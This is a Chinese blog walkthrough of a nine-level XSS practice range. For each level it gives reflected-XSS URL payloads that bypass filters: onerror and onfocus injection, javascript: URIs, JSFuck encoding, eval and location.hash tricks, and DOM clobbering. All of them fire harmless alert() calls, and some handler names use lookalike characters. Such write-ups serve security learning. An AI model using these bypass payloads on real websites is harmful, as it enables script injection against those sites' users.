XSS靶场漏洞复现

已于 2024-08-17 14:09:30 修改
阅读量1.3k 收藏 32
点赞数 26
文章标签: xss 前端 javascript
于 2024-08-17 14:08:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chainsofted/article/details/141278889
版权

目录

第一关 Ma Spaghet!

第二关 Jefff

第三关 Ugandan Knuckles

第四关 Ricardo Milos

第五关 Ah That's Hawt

第六关 Ligma

第七关 Mafia

第八关 Ok, Boomer

第九关 WW3

第一关 Ma Spaghet!

1.尝试使用弹窗的方式:?somebody=<script>alert(1)</script>

2.使用img标签就可以弹出:?somebody=<img src=1 οnerrοr="alert(1337)">

3.防御方法:将innerHTML换成innerText函数,因为innerText不会将字符串解析为<p>标签

第二关 Jefff

1.传值后显示:?jeff=aaaaaaa

2.使用双引号闭合:?jeff=aaa";alert(1337);"

3.使用-连接符同样也可以弹出:?jeff=aaa"-alert(1337);-"

第三关 Ugandan Knuckles

1.尝试用户交互方式,但需要用户点击文本框才会弹出,所以失败:?weyaaaa"%20οnclick="alert(1)

2.使用onfocus焦点自动触发:?wey=aaaa" οnfοcus=alert(1337) autofocus="

第四关 Ricardo Milos

1.两秒后自动触发:?ricardo=javascript:alert(1337)

第五关 Ah That's Hawt

1.使用javascript和编码来实现:?markassbrownlee=<img src=1 οnerrοr=location="javascript:alert%25281%2529">

第六关 Ligma

1.过滤了字母数字,所以要使用编码的方式

replace(/[A-Za-z0-9]/g, '')

2.登录jsfuck进行转码

3.然后进行urlcode转码

第七关 Mafia

1.用函数方式转为小写:?mafia=Function(/ALERT(1337)/.source.toLowerCase())()

2.用eval转换中间编码为alert:?mafia=eval(8680439..toString(30))(1337)

3.用hash的方式截取:?mafia=eval(location.hash.slice(1))#alert(1337)

第八关 Ok, Boomer

1.使用tel方法:?boomer=<a%20id=ok%20href="tel:alert(1337)">

第九关 WW3

1.加载路径:?text=aaa&img=https://i.imgur.com/PdbDexI.jpg

2.未触发?text=<img%20src=1%20οnerrοr=alert(1)>&img=https://i.imgur.com/PdbDexI.jpg

3.传图片:?text=img=<img name%3dnotify><style><style%2F><script>alert(1337)%2F%2F&img=https://i.imgur.com/PdbDexI.jpg

chainsofted
关注
XSS LABS 靶场工具合集
08-29
1. XSS LABS 靶场源码(Level 14 修复版) 2. PhpStudy Windows 安装包,与笔记配套 3. Flash XSS 逆向工具 JPEXS Windows 安装包 4. Flash 浏览器安装包,用于 XSS LABS 后两关的环境配置 5. Google 浏览器插件 - ...
DedeCMS 存储型xss漏洞1
08-03
【DedeCMS 存储型 XSS 漏洞1】详解 DedeCMS 是一款广泛使用的基于PHP的开源网站管理系统,其特色在于提供了一个简洁易用的后台管理界面,帮助企业或个人快速构建网站。然而,如同任何软件一样,DedeCMS 也存在安全...
DAY52WEB 攻防-XSS 跨站&反射型&存储型&DOM 型&标签闭合&输入输出&JS 代码解析
m0_74402888的博客
10-16 646
解决方式:使用特定的语句进行替换,如**x onerror=”alert(1)”**如果你将 onerror="alert(1)" 嵌入到某个 HTML 元素中,那么当该元素加载失败时(例如图像加载失败、脚本加载失败等),JavaScript 中的 alert(1) 将会被执行,弹出一个带有 “1” 的警告框。通过URL访问该页面http://192.168.137.1:84/domxss.html#https://www.baidu.com)并在**#后面跟上,想要跳转的页面,访问即可成功跳转**
web扩展
x737510的博客
10-10 609
HTTP(Hypertext Transfer Protocol)协议中的它们在用途和使用方式上有一些区别。用于请求服务器上的资源,通常是获取数据。GET 请求是幂等的,多次请求返回的结果应该是相同的,而且不应该对服务器产生任何副作用。用于向服务器提交数据,通常是提交表单数据或上传文件等。POST 请求可能对服务器产生副作用,例如在数据库中创建新的资源。数据通过 URL 参数传递,附在 URL 后面。因为数据在 URL 中可见,所以不适合传递敏感信息,且有长度限制。
06_实现watch
qq_53109172的博客
10-16 744
watch 本质上就是监听一个响应式数据,这个响应式数据发生变化的时候,进行通知并触发相应的回调函数。
004-按照指定功能模块名称分组
xiaogang1226的博客
10-16 183
需要把一个功能模块的几个功能点放在同一个文档目录下,这几个功能点分布在不同的 Controller。需要把他们单独分组,方便前端对接。在@ApiOperation 里面增加属性 tags 赋值。
前端地图数据开发
shuxiaoxii的博客
10-13 281
基于Turf.js教你快速实现地理围栏的合并拆分。turf js 地理空间分析库,处理各种地图算法。如何拆分一个乡镇或区的地图。获取市级的行政区域划分。直接导入地图的json。高德地图查看市级区域。js实现地图区域合并。
Vue3动态组件component不生效问题解决方法
Java_fenxiang的博客
10-14 696
问题:vue3循环渲染动态组件component不生效,页面空白在vue3使用component动态组件展示组件时,组件就是不展示显示空白。在vue2中使用动态变量component展示组件都是没问题。试了很多方法 踩了很多坑,所以记录下:登录后复制 <div class="preview-list" id="c...
Element-plus el-form、el-dialog 数据回显同时用时,重置失效问题
Mr. Zhang Xiaojian's Blog
10-12 509
当第一次打开网页并点击“编辑”按钮时,虽然对话框变量变为 true 使对话框可见,但同步代码会将 formData 对象的属性设置为默认值。由于 Vue 的异步更新机制,DOM 实际上还未更新,因此表单组件内绑定了这些有值的初始数据。这样,在后续调用 resetFields 方法时,表单将会重置为这些默认值而不是空值。编辑时表单的初始值被设置成了回显的数据,而不是空字符串。时,表单会回到上次设置的初始值,即回显的数据。
基于monaco-editor的web日志组件
暗影刀客的博客
10-12 293
一个基于monaco-editor的web日志组件,支持灵活的扩展配置,支持vue和react
字节跳动青训营开始报名了!
窗外风景随心变幻
10-10 2273
青训营是字节跳动技术团队发起的技术系列培训 &人才选拔项目;面向高校在校生,旨在培养优秀且具有职业竞争力的开发工程师。本次技术训练营由掘金联合豆包MarsCode 团队主办课程包含前端、后端和 A 方向,在这个飞速发展的 AI 时代,我们将和豆包MarsCode 一起深入探索,在青训营的技术氛围中,学习 AI,使用 Al,高效写码~
react 中的hooks中的useState
最新发布
m0_61265297的博客
10-16 124
有两种方式,第一种方式直接写值,第二种方式(第一个参数是原来的值,第二个参数返回一个新的值)
如何查看GB28181流媒体平台LiveGBS中对GB28181实时视频数据统计的负载信息
10-12 480
@目录1、负载信息2、负载信息说明3、会话列表查看3.1、会话列表4、停止会话5、搭建GB28181视频直播平台1、负载信息 实时展示直播、回放、播放、录像、H265、级联等使用数目 2、负载信息说明 直播:当前推流到平台的实时视频数目 回放:当前推流到平台的回放视频数目 播放:当前观看直播和回放的在线人数之和 录像:当前正在云端录像的通道数目 H265:当前推流到平台的视频中编码为H265...
前端高频面试题2024/9/22(偏项目问题--通用后台管理系统)
qq_46617150的博客
10-11 932
前端通过ts限制数据类型,后端通过joi限制数据类型这里的这个joi是对输入数据进行限制的中间件!!
JavaScript前端开发技术
Chujun123528的博客
10-12 1013
JavaScript前端开发是一个充满挑战和机遇的领域。随着技术的不断进步和用户需求的变化,前端开发者需要不断学习新知识、掌握新技能,以应对日益复杂和多样化的开发需求。同时,注重性能优化和安全实践也是前端开发不可或缺的一部分。通过不断探索和创新,我们可以为用户创造更加优质、高效和安全的Web体验。在JavaScript前端开发的学习过程中,建议从基础语法入手,逐步掌握DOM操作、事件处理、Ajax通信等核心技能。同时,关注最新的前端框架和库的发展动态,尝试将它们应用到实际项目中。
6云图书管理系统-图书展示
zi__you的博客
10-13 1143
1 /src/store中新增userInfo.js,用于保存用户的登录信息 import { defineStore } from "pinia" import { ref } from 'vue' export const userInfoStore = defineStore('userInfo', () => { //1.定义用户信息 const info = ref({}) const isAdmin = ref(false) //2.定义修改用户信息的方法
centos7删除xss靶场
07-25
要删除CentOS 7上的XSS靶场,按照以下步骤进行操作: 1. 首先,登录到CentOS 7服务器。 2. 找到XSS靶场的安装目录。通常情况下,靶场的文件会存储在/var/www/html/或/opt目录下。你可以使用以下命令来查找: ```...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值